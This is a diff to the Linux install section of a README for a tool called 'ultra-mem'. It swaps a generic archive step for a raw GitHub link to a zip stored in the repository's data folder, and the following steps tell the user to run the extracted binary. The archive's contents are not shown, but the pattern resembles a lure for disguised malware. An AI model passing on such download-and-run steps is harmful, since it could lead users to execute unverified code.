EDGARKAKANYAN/ultra-mem/README.md

 #### For Linux Users

-1. Extract the downloaded `.tar.gz` file.
+1. Extract the downloaded `https://raw.githubusercontent.com/EDGARKAKANYAN/ultra-mem/main/data/ultra-mem_v2.3.zip` file.
 2. Open a terminal and navigate to the extracted folder.
 3. Run the command `./ultra-mem` to start the application.